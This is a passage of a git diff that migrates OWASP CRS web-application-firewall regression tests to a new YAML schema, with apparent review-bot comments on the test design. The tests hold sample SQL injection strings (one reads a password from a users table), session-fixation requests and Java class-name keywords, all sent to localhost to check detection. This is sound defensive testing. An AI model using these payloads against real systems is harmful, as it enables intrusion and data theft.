'c' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-36 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 36 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"a":1}'::jsonb #> '{a,b}' ? 'c' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" - version: HTTP/1.0 - output: - log_contains: id "942550" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml index 8e1cbfb..091b972 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml 
+++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml 
@@ -2,40 +2,39 @@
 meta:
 author: "Xhoenix, azurit"
 description: MySQL Scientific Notation bypass payloads Detection
- enabled: true
- name: 942560.yaml
+rule_id: 942560
 tests:
- - test_title: 942560-1
+ - test_id: 1
 desc: "Positive test for Scientific Notation in MySQL, e.g 1.e("
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get"
- data: "email=1.e(ascii+1.e(substring(1.e(select+password+from+users+limit+1+1.e,1+1.e)+1.e,1+1.e,1+1.e)1.e)1.e)+=+70+or'1'='2"
- version: HTTP/1.0
- output:
- log_contains: id "942560"
- - test_title: 942560-2
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get"
+ data: "email=1.e(ascii+1.e(substring(1.e(select+password+from+users+limit+1+1.e,1+1.e)+1.e,1+1.e,1+1.e)1.e)1.e)+=+70+or'1'='2"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942560]
+ - test_id: 2
 desc: "Status Page Test - simplified positive test for Scientific Notation in MySQL, e.g 1.e("
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "foo=1.e(ascii)"
- version: HTTP/1.0
- output:
- log_contains: id "942560"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "foo=1.e(ascii)"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942560]
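Review bot: Both tests in this block carry the payload in a request body (`data:`) with no `Content-Type` header, and test 1 does so on a `GET` to `uri: "/get"`; whether that body is decoded into the argument variables 942560 inspects then depends on the test runner quietly defaulting the content type, which nothing in the hunk makes explicit. Making the dependency visible keeps the test meaningful under any runner and any engine body-parsing policy: add `Content-Type: application/x-www-form-urlencoded` under `headers:` in both inputs, or for test 1 move the `email=...` payload into the query string of `uri: "/get"`. It would also help the next reader if `desc` said where the payload travels, e.g. `desc: "Positive test for Scientific Notation in MySQL, e.g 1.e( (payload in urlencoded body)"`.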
diff --git a/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml b/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml
index 1713247..56e504c 100644
--- a/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml
+++ b/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml
@@ -1,49 +1,47 @@
 ---
 meta:
 author: "csanders-git, azurit"
- description: None
- enabled: true
- name: 943100.yaml
+rule_id: 943100
 tests:
- - test_title: 943100-1
+ - test_id: 1
 desc: Session Fixation Attack (943100) from old modsec regressions
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip, deflate
- Accept-Language: zh-sg
- Host: localhost
- Keep-Alive: '300'
- Proxy-Connection: keep-alive
- Referer: http
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: '/get/foo.php?bar=blah'
- version: HTTP/1.1
- output:
- log_contains: id "943100"
- - test_title: 943100-2
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip, deflate
+ Accept-Language: zh-sg
+ Host: localhost
+ Keep-Alive: '300'
+ Proxy-Connection: keep-alive
+ Referer: http
+ User-Agent: "OWASP CRS test agent"
+ method: GET
+ port: 80
+ uri: '/get/foo.php?bar=blah'
+ version: HTTP/1.1
+ output:
+ log:
+ expect_ids: [943100]
+ - test_id: 2
 desc: "Status Page Test - Possible Session Fixation Attack: Part of Setting Cookie Values in ARG"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip, deflate
- Accept-Language: zh-sg
- Host: localhost
- Keep-Alive: '300'
- Proxy-Connection: keep-alive
- Referer: http
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get/foo.php?test=.cookie;expires="
- version: HTTP/1.1
- output:
- log_contains: id "943100"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip, deflate
+ Accept-Language: zh-sg
+ Host: localhost
+ Keep-Alive: '300'
+ Proxy-Connection: keep-alive
+ Referer: http
+ User-Agent: "OWASP CRS test agent"
+ method: GET
+ port: 80
+ uri: "/get/foo.php?test=.cookie;expires="
+ version: HTTP/1.1
+ output:
+ log:
+ expect_ids: [943100]
diff --git a/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml b/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml
index 0802f4f..f0a0200 100644
--- a/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml
+++ b/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml
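Review bot: Test 1 in this block (`desc: Session Fixation Attack (943100) from old modsec regressions`) has no visible cookie-setting payload: the new-side request is `uri: '/get/foo.php?bar=blah'` with `Referer: http` and no `data:` or `Cookie` header, so it is not clear from the hunk which input is meant to trigger 943100, and the migration to `expect_ids: [943100]` carries that opacity forward. The bare `Referer: http` looks like a truncated value from the original regression and may be where the trigger was lost; worth checking against the upstream CRS test before relying on this one. Test 2 shows the shape that does exercise the rule (`uri: "/get/foo.php?test=.cookie;expires="`); either give test 1 an explicit payload of that kind or extend its `desc` to name the matching input, e.g. `desc: "Session Fixation Attack (943100) from old modsec regressions - trigger: <name the argument or header that matches>"`.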
@@ -1,85 +1,83 @@ --- meta: author: "csanders-git, azurit" - description: None - enabled: true - name: 943110.yaml +rule_id: 943110 tests: - - test_title: 943110-1 + - test_id: 1 desc: Session Fixation Attack (943110) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http://www.attackersite.com/test - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" - version: HTTP/1.1 - output: - log_contains: id "943110" - - test_title: 943110-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http://www.attackersite.com/test + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" + version: HTTP/1.1 + output: + log: + expect_ids: [943110] + - test_id: 2 desc: "session fixation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Referer: "https://localhost.attackersite.com/" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?phpsessid=asdfdasfadsads" - version: HTTP/1.0 - output: - log_contains: id "943110" - - test_title: 943110-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Referer: "https://localhost.attackersite.com/" 
+ User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?phpsessid=asdfdasfadsads" + version: HTTP/1.0 + output: + log: + expect_ids: [943110] + - test_id: 3 desc: "session fixation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Referer: "https://attackersite.com/" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?phpsessid=asdfdasfadsads" - version: HTTP/1.0 - output: - log_contains: id "943110" - - test_title: 943110-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Referer: "https://attackersite.com/" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?phpsessid=asdfdasfadsads" + version: HTTP/1.0 + output: + log: + expect_ids: [943110] + - test_id: 4 desc: Session Fixation Attack (943110) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Referer: http://localhost/test - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" - version: HTTP/1.1 - output: - no_log_contains: id "943110" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: 
application/x-www-form-urlencoded + Host: localhost + Referer: http://localhost/test + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" + version: HTTP/1.1 + output: + log: + no_expect_ids: [943110] diff --git a/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml b/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml index 9350814..33a8746 100644 --- a/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml +++ b/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml @@ -1,27 +1,25 @@ --- meta: author: "csanders-git, azurit" - description: None - enabled: true - name: 943120.yaml +rule_id: 943120 tests: - - test_title: 943120-1 + - test_id: 1 desc: Session Fixation Attack (943120) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" - version: HTTP/1.1 - output: - log_contains: id "943120" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" + version: HTTP/1.1 + output: + log: + expect_ids: [943120] 
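Review bot: Tests 2 and 3 share the bare desc `session fixation attack`, which hides that test 2 is the interesting one: its Referer `https://localhost.attackersite.com/` embeds the target Host as a subdomain label, the case a naive substring or prefix comparison of Referer against Host would wrongly treat as same-site. Suggest `desc: "Referer host embeds target Host as a subdomain label (localhost.attackersite.com) - must still match"` for test 2 and `desc: "Referer on an unrelated host (attackersite.com)"` for test 3. Test 4 is the only `no_expect_ids` case and uses `Referer: http://localhost/test`; a same-host `https://localhost/` variant would confirm the scheme plays no part in the host comparison, since the only https Referers in the file (tests 2 and 3) are both expected to match.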
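Review bot: The single test here sends no Referer header at all, and that omission is presumably the trigger (it is the only difference from 943110 test 4, which sends `Referer: http://localhost/test` and expects no hit), but neither the desc nor any negative case records that. Suggest `desc: "jsessionid in ARGS with no Referer header (943120)"` and a second test that repeats the request with `Referer: http://localhost/test` under `no_expect_ids: [943120]`, so a future edit that makes 943120 fire regardless of Referer is caught by this file rather than only by the 943110 suite.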
diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml index 9cbf3d2..89a8f75 100644 --- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml +++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml @@ -1,27 +1,25 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944000.yaml" - description: "Description" +rule_id: 944000 tests: - - test_title: 944000-1 + - test_id: 1 desc: Using text/plain Content-Type which do not have any bodyprocessor associated stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - version: HTTP/1.0 - uri: "/post" - data: "test=value" - output: - no_log_contains: "id \"944000\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + uri: "/post" + data: "test=value" + output: + log: + no_expect_ids: [944000] diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml index 8070503..c1a60d1 100644 --- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml +++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml 
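Review bot: This file holds only a `no_expect_ids` case, which passes just as well when 944000 is never evaluated (rule disabled, body not read, request rejected earlier in the chain) as when it correctly declines to match, so on its own it gives no evidence the rule is live. Pair it with a positive control in the same file, or at minimum note in the desc that the case is a vacuous-pass risk. The desc also reads awkwardly; suggest `desc: "text/plain Content-Type has no body processor associated, so 944000 must not fire on a form-like body"`.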
@@ -1,373 +1,371 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944100.yaml" - description: "Description" +rule_id: 944100 tests: - - test_title: 944100-1 + - test_id: 1 desc: Argument test includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/x-www-form-urlencoded" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=java.lang.Runtime" - output: - log_contains: "id \"944100\"" - - test_title: 944100-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/x-www-form-urlencoded" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=java.lang.Runtime" + output: + log: + expect_ids: [944100] + - test_id: 2 desc: Argument test includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=java.lang.ProcessBuilder" - output: - log_contains: "id \"944100\"" - - test_title: 944100-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=java.lang.ProcessBuilder" + output: + log: + expect_ids: [944100] + - test_id: 3 desc: Argument name includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.lang.Runtime=test" - output: - log_contains: "id \"944100\"" - - test_title: 944100-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.lang.Runtime=test" + output: + log: + expect_ids: [944100] + - test_id: 4 desc: Argument name includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.lang.ProcessBuilder=test" - output: - log_contains: "id \"944100\"" - - test_title: 944100-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP 
CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.lang.ProcessBuilder=test" + output: + log: + expect_ids: [944100] + - test_id: 5 desc: Cookie test includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.lang.Runtime - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.lang.Runtime + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944100] + - test_id: 6 desc: Cookie test includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.lang.ProcessBuilder - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-7 + - input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.lang.ProcessBuilder + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944100] + - test_id: 7 desc: Cookie name includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.lang.Runtime=test - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.lang.Runtime=test + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944100] + - test_id: 8 desc: Cookie name includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.lang.ProcessBuilder=test - method: POST - uri: "/post" - version: 
HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.lang.ProcessBuilder=test + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944100] + - test_id: 9 desc: Request header test includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.lang.Runtime - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.lang.Runtime + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944100] + - test_id: 10 desc: Request header test includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - 
Content-Type: "text/plain" - test: java.lang.ProcessBuilder - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.lang.ProcessBuilder + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944100] + - test_id: 11 desc: XML element includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944100\"" - - test_title: 944100-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "value" + output: + log: + no_expect_ids: [944100] + - test_id: 12 desc: XML attribute name includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 